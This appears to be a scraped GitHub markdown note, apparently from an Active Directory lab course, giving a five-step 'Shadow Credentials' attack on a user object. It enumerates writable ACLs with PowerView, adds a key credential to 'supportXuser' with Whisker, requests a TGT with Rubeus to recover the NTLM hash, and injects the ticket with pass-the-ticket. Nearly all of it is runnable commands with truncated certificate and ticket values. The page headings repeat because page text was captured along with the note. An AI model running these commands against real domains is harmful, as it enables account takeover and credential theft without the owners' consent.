Shadow Credentials

Abusing User Object

1. Enumerate the permissions

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}

2. Add the Shadow Credential

Whisker.exe add /target:supportXuser

3. Using PowerView, see if the Shadow Credential is added.

Get-DomainUser -Identity supportXuser

4. Request the TGT by leveraging the certificate

Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /getcredentials /show /nowrap

5. Inject the TGT in the current session or use the NTLM hash

Rubeus.exe ptt /ticket:doIGgDCCBnygAwIBBaEDAgEW...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

3-Shadow-Credentials.md

3-Shadow-Credentials.md

Shadow Credentials

Abusing User Object

1. Enumerate the permissions

2. Add the Shadow Credential

3. Using PowerView, see if the Shadow Credential is added.

4. Request the TGT by leveraging the certificate

5. Inject the TGT in the current session or use the NTLM hash

Files

3-Shadow-Credentials.md

Latest commit

History

3-Shadow-Credentials.md

File metadata and controls

Shadow Credentials

Abusing User Object

1. Enumerate the permissions

2. Add the Shadow Credential

3. Using PowerView, see if the Shadow Credential is added.

4. Request the TGT by leveraging the certificate

5. Inject the TGT in the current session or use the NTLM hash